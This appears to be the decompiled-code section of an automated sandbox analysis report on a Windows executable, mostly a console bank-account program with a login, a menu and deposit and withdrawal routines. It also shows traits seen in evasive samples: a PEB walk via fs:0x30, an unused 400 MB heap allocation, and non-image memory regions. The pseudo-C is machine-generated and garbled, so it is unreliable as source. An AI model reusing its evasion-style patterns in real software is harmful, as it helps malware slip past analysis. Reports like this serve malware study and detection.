                                                				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
                                                				_v8 = _t5;
                                                				_push(_t5);
                                                				if(_t5 != 0x11) {
                                                					asm("cld");
                                                				}
                                                				asm("clc");
                                                				_pop(_t7);
                                                				if(_v8 != 0) {
                                                					E01236C50(_t14, _v8, 0x17d78400);
                                                					_push(_t11);
                                                					asm("cld");
                                                					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
                                                				}
                                                				return _t7;
                                                			}


                                                APIs
                                                • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                • HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$Process$AllocAllocate
                                                • String ID:
                                                • API String ID: 1154092256-0
                                                • Opcode ID: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction ID: 9dae238677a1239a02aa92dfad56ca1e7c34d6a8839d004e10bf93faf7fc9f44
                                                • Opcode Fuzzy Hash: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction Fuzzy Hash: B8F0E2B5560618BFE7106AF8BC0DFABB79CE704309F201544F604D3240D5B25A008B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _t17;
                                                				intOrPtr _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				intOrPtr _t28;
                                                				signed int _t38;
                                                				void* _t40;
                                                				void* _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				void* _t53;
                                                				void* _t60;
                                                
                                                				_t60 = __fp0;
                                                				_t47 = __edi;
                                                				_t46 = __edx;
                                                				E0123FC48();
                                                				_push(0x14);
                                                				_push(0x124d838);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t49 = E0123C013() & 0x0000ffff;
                                                				E0123FBFB(2);
                                                				_t53 =  *0x1230000 - 0x5a4d; // 0x5a4d
                                                				if(_t53 == 0) {
                                                					_t17 =  *0x123003c; // 0xf0
                                                					__eflags =  *((intOrPtr*)(_t17 + 0x1230000)) - 0x4550;
                                                					if( *((intOrPtr*)(_t17 + 0x1230000)) != 0x4550) {
                                                						goto L2;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t17 + 0x1230018)) - 0x10b;
                                                						if( *((intOrPtr*)(_t17 + 0x1230018)) != 0x10b) {
                                                							goto L2;
                                                						} else {
                                                							_t38 = 0;
                                                							__eflags =  *((intOrPtr*)(_t17 + 0x1230074)) - 0xe;
                                                							if( *((intOrPtr*)(_t17 + 0x1230074)) > 0xe) {
                                                								__eflags =  *(_t17 + 0x12300e8);
                                                								_t6 =  *(_t17 + 0x12300e8) != 0;
                                                								__eflags = _t6;
                                                								_t38 = 0 | _t6;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				 *(_t51 - 0x1c) = _t38;
                                                				if(E0123D058() == 0) {
                                                					E012389F5(0x1c);
                                                				}
                                                				if(E0123D6D2(_t38, _t47) == 0) {
                                                					_t19 = E012389F5(0x10);
                                                				}
                                                				E0123BE1F(_t19);
                                                				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                				E0123A5C3();
                                                				 *0x1254080 = GetCommandLineA(); // executed
                                                				_t23 = E0123FCE2(); // executed
                                                				 *0x1252284 = _t23;
                                                				_t24 = E0123F8ED();
                                                				_t56 = _t24;
                                                				if(_t24 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t56, 8);
                                                				}
                                                				_t25 = E0123FB1A(_t38, _t46, _t47, _t49);
                                                				_t57 = _t25;
                                                				if(_t25 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t57, 9);
                                                				}
                                                				_t26 = E01237559(_t47, _t49, 1);
                                                				_pop(_t40);
                                                				_t58 = _t26;
                                                				if(_t26 != 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t58, _t26);
                                                					_pop(_t40);
                                                				}
                                                				_t28 = E01231040(_t40, _t47, _t49, _t58, _t60, 0x1230000, 0, E0123FD6D(), _t49); // executed
                                                				_t50 = _t28;
                                                				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
                                                				if(_t38 == 0) {
                                                					E012377B1(_t50);
                                                				}
                                                				E0123754A();
                                                				 *(_t51 - 4) = 0xfffffffe;
                                                				return E012391A5(_t50);
                                                			}


                                                APIs
                                                • ___security_init_cookie.LIBCMT ref: 012388A7
                                                  • Part of subcall function 0123C013: GetStartupInfoW.KERNEL32(?), ref: 0123C01D
                                                • _fast_error_exit.LIBCMT ref: 01238920
                                                • _fast_error_exit.LIBCMT ref: 01238931
                                                • __RTC_Initialize.LIBCMT ref: 01238937
                                                • __ioinit0.LIBCMT ref: 01238940
                                                • GetCommandLineA.KERNEL32(0124D838,00000014), ref: 01238945
                                                • ___crtGetEnvironmentStringsA.LIBCMT ref: 01238950
                                                • __setargv.LIBCMT ref: 0123895A
                                                • __setenvp.LIBCMT ref: 0123896B
                                                • __cinit.LIBCMT ref: 0123897E
                                                • __wincmdln.LIBCMT ref: 0123898F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                • String ID:
                                                • API String ID: 1504447550-0
                                                • Opcode ID: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction ID: acb88bd50112b435b4ca55ab7925efa647529ededd94379bb1d7c77e9e9c0735
                                                • Opcode Fuzzy Hash: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction Fuzzy Hash: 3A210AF0A303079AEF297BB87989B3D61546FE0711F100629FA05AF1C1EFB485459767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 100%
                                                			E0123C0A3(struct _EXCEPTION_POINTERS* _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				return UnhandledExceptionFilter(_a4);
                                                			}




                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01238B1A,?,?,?,00000000), ref: 0123C0A8
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0123C0B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0123C080(_Unknown_base(*)()* _a4) {
                                                
                                                				return SetUnhandledExceptionFilter(_a4);
                                                			}




                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0123F78E,0123F743,?,00000000,00000000,00000000,00000000), ref: 0123C086
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01236A00() {
                                                
                                                				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                			}




                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E01233610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				char _v36;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v68;
                                                				char _v80;
                                                				char _v92;
                                                				char _v124;
                                                				char _v156;
                                                				void* __ebp;
                                                				intOrPtr _t58;
                                                				intOrPtr _t60;
                                                				void* _t61;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t108;
                                                				intOrPtr _t111;
                                                				void* _t121;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t129;
                                                				void* _t130;
                                                				void* _t131;
                                                				void* _t139;
                                                				void* _t148;
                                                
                                                				_t148 = __fp0;
                                                				_t122 = __esi;
                                                				_t121 = __edi;
                                                				_t108 = __ebx;
                                                				_v68 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v12 = 0;
                                                				_v20 = 0;
                                                				_v20 = 0;
                                                				do {
                                                					E01231380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					_t127 = _t123 + 0x14;
                                                					E012312F0(_t121, _t122,  &_v68);
                                                					_v20 = _v20 + 1;
                                                					_t143 = _v20 - 3;
                                                					if(_v20 == 3) {
                                                						E012320E0( &_v68, _t121, _t122, _t143, _t148);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124fb98);
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						E012312B0(0x16, 0xc);
                                                						_push("Press ENTER to exit the program...");
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						_t127 = _t127 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_v12 = 0;
                                                					_t58 = E01236EF1("USER.DAT", "r");
                                                					_t128 = _t127 + 8;
                                                					 *0x1252f28 = _t58;
                                                					while(1) {
                                                						_push( &_v156);
                                                						_push( &_v124);
                                                						_t60 =  *0x1252f28; // 0x0
                                                						_t61 = E01237021(_t60, "%s %s %s\n",  &_v92);
                                                						_t129 = _t128 + 0x14;
                                                						if(_t61 == 0xffffffff) {
                                                							break;
                                                						}
                                                						_t98 = E01238230(0x1252ee4,  &_v124);
                                                						_t128 = _t129 + 8;
                                                						if(_t98 == 0) {
                                                							_t99 = E01238230(0x1252f02,  &_v156);
                                                							_t128 = _t128 + 8;
                                                							if(_t99 == 0) {
                                                								_v12 = _v12 + 1;
                                                							}
                                                						}
                                                					}
                                                					_t111 =  *0x1252f28; // 0x0
                                                					_push(_t111);
                                                					E01236DB6(_t108, _t121, _t122, __eflags);
                                                					_t130 = _t129 + 4;
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						goto L10;
                                                					}
                                                					break;
                                                					L10:
                                                					E012312B0(0xa, 0xa);
                                                					_push(0x124fbf8);
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t123 = _t130 + 4;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				E01238417(__eflags,  &_v80);
                                                				_t131 = _t130 + 4;
                                                				E01233AB0(_t108, _t121, _t122, _t148);
                                                				do {
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					E012312B0(0xf, 8);
                                                					_push("1. Create New Account\n");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xa);
                                                					_push("2. Cash Deposit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xc);
                                                					_push("3. Cash Withdrawl");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xe);
                                                					_push("4. Fund Transfer");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0x10);
                                                					_push("5. Account information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 8);
                                                					_push("6. Transaction information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xa);
                                                					_push("7. Log out");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xc);
                                                					_push("8. Exit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t139 = _t131 + 0x20;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						__eflags = _v24 - 0x4e;
                                                						if(__eflags >= 0) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t139 = _t139 + 4;
                                                						_t111 = _v24 + 1;
                                                						__eflags = _t111;
                                                						_v24 = _t111;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push("Press a choice between the range [1-8] ");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t131 = _t139 + 4;
                                                					_v16 = 0x30;
                                                					_v16 = _v16 - 1;
                                                					__eflags = _v16 - 7;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 8!");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press any key to return to main menu...");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t131 = _t131 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v16 * 4 +  &M01233A88))) {
                                                							case 0:
                                                								E01233DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
                                                								goto L35;
                                                							case 1:
                                                								__eax = E01234640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 2:
                                                								__eax = E012349E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 3:
                                                								__eax = E01234E90(__ebx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 4:
                                                								__eax = E01235600(__ebx, __ecx, __eflags, __fp0);
                                                								goto L35;
                                                							case 5:
                                                								__eax = E01236190(__ebx, __ecx, __edx, __fp0);
                                                								goto L35;
                                                							case 6:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to Log out? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__ecx = _v5;
                                                								__eflags = __ecx - 0x59;
                                                								if(__eflags == 0) {
                                                									L28:
                                                									_t40 =  &_v36; // -15
                                                									_t40 = E01238417(__eflags, _t40);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t41 =  &_v36; // -15
                                                									__ecx = _t41;
                                                									_push(_t41);
                                                									_t42 =  &_v80; // -59
                                                									__edx = _t42;
                                                									_push(_t42);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__eax =  *0x1252f28; // 0x0
                                                									_push(__eax);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E01233610(__ebx, __edi, __esi, __fp0);
                                                								} else {
                                                									__edx = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L28;
                                                									}
                                                								}
                                                								goto L35;
                                                							case 7:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(__eflags == 0) {
                                                									L32:
                                                									_t45 =  &_v36; // -15
                                                									__ecx = _t45;
                                                									__eax = E01238417(__eflags, _t45);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t46 =  &_v36; // -15
                                                									__edx = _t46;
                                                									_push(_t46);
                                                									_t47 =  &_v80; // -59
                                                									__eax = _t47;
                                                									_push(_t47);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__edx =  *0x1252f28; // 0x0
                                                									_push(__edx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E012377B1(0);
                                                								} else {
                                                									__eax = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L32;
                                                									}
                                                								}
                                                								goto L35;
                                                						}
                                                					}
                                                					L35:
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return 1;
                                                			}

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01233667
                                                • _wprintf.LIBCMT ref: 0123367D
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123368F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 012336A5
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012336D8
                                                • _wprintf.LIBCMT ref: 01233863
                                                • _wprintf.LIBCMT ref: 01233879
                                                • _wprintf.LIBCMT ref: 012338A7
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E21
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E54
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E6C
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E80
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E94
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233EAA
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EBB
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233ED1
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EE2
                                                • _wprintf.LIBCMT ref: 012338BF
                                                • _wprintf.LIBCMT ref: 012336EE
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                • _swscanf.LIBCMT ref: 01233735
                                                • _wprintf.LIBCMT ref: 012337A2
                                                • __wstrtime.LIBCMT ref: 012337BF
                                                • _wprintf.LIBCMT ref: 012337DF
                                                • _wprintf.LIBCMT ref: 012337F5
                                                • _wprintf.LIBCMT ref: 0123380B
                                                • _wprintf.LIBCMT ref: 01233821
                                                • _wprintf.LIBCMT ref: 01233837
                                                • _wprintf.LIBCMT ref: 0123384D
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                                • API String ID: 1611355571-1720101819
                                                • Opcode ID: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction ID: c97e78d35ff57704f51b266a57c2891e41bfbc009934773b4c93d9347c0e3cb9
                                                • Opcode Fuzzy Hash: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction Fuzzy Hash: 4FA1B4F2EB4307ABEB15FBE49D43BBE76606BE1B10F004128E945752C0E9B1A2584767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E012349E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v324;
                                                				char _v376;
                                                				char _v456;
                                                				void* __ebp;
                                                				intOrPtr _t64;
                                                				intOrPtr _t70;
                                                				intOrPtr _t75;
                                                				void* _t76;
                                                				intOrPtr _t77;
                                                				void* _t81;
                                                				char _t97;
                                                				intOrPtr _t99;
                                                				void* _t104;
                                                				intOrPtr _t105;
                                                				intOrPtr _t110;
                                                				void* _t117;
                                                				void* _t122;
                                                				void* _t127;
                                                				intOrPtr _t147;
                                                				intOrPtr _t148;
                                                				intOrPtr _t168;
                                                				intOrPtr _t173;
                                                				void* _t177;
                                                				void* _t180;
                                                				void* _t184;
                                                				void* _t185;
                                                				void* _t193;
                                                				void* _t195;
                                                				void* _t196;
                                                				void* _t205;
                                                
                                                				_t215 = __fp0;
                                                				_t176 = __esi;
                                                				_t175 = __edi;
                                                				_t132 = __ecx;
                                                				_t131 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Withdraw from A/C number          : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				_t64 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t180 = _t177 + 0x14;
                                                				 *0x1252f28 = _t64;
                                                				_t214 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t132, __edi, __esi, _t214, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(__ebx, _t175, _t176, _t214);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v376);
                                                				_push("[ %s ]");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Withdrawn (in NRs.)  : ");
                                                				E0123715C(__ebx, _t175, _t176, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				_t70 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t184 = _t180 + 0x1c;
                                                				 *0x1252f28 = _t70;
                                                				_v16 = 0;
                                                				while(1) {
                                                					_push( &_v32);
                                                					_push( &_v36);
                                                					_push( &_v40);
                                                					_push( &_v42);
                                                					_push( &_v140);
                                                					_push( &_v113);
                                                					_push( &_v62);
                                                					_push( &_v112);
                                                					_push( &_v125);
                                                					_push( &_v170);
                                                					_push( &_v200);
                                                					_t75 =  *0x1252f28; // 0x0
                                                					_t76 = E01237021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                					_t185 = _t184 + 0x38;
                                                					__eflags = _t76 - 0xffffffff;
                                                					if(__eflags == 0) {
                                                						break;
                                                					}
                                                					_t122 = E01238230( &_v208,  &_v28);
                                                					_t184 = _t185 + 8;
                                                					__eflags = _t122;
                                                					if(__eflags == 0) {
                                                						asm("movss xmm0, [ebp-0x8]");
                                                						asm("comiss xmm0, [ebp-0x1c]");
                                                						if(__eflags > 0) {
                                                							E012320E0( &_v28, _t175, _t176, __eflags, _t215);
                                                							E012312B0(0x14, 0xc);
                                                							asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                							asm("movsd [esp], xmm0");
                                                							_push("Sorry, the current balance is Rs. %.2f only!");
                                                							E0123715C(_t131, _t175, _t176, __eflags);
                                                							E012312B0(0x19, 0xe);
                                                							_push("Transaction NOT completed!");
                                                							_t127 = E0123715C(_t131, _t175, _t176, __eflags);
                                                							_v16 = 1;
                                                							return _t127;
                                                						}
                                                					}
                                                				}
                                                				_t77 =  *0x1252f28; // 0x0
                                                				_push(_t77);
                                                				E01236DB6(_t131, _t175, _t176, __eflags);
                                                				E012320E0( &_v200, _t175, _t176, __eflags, _t215);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
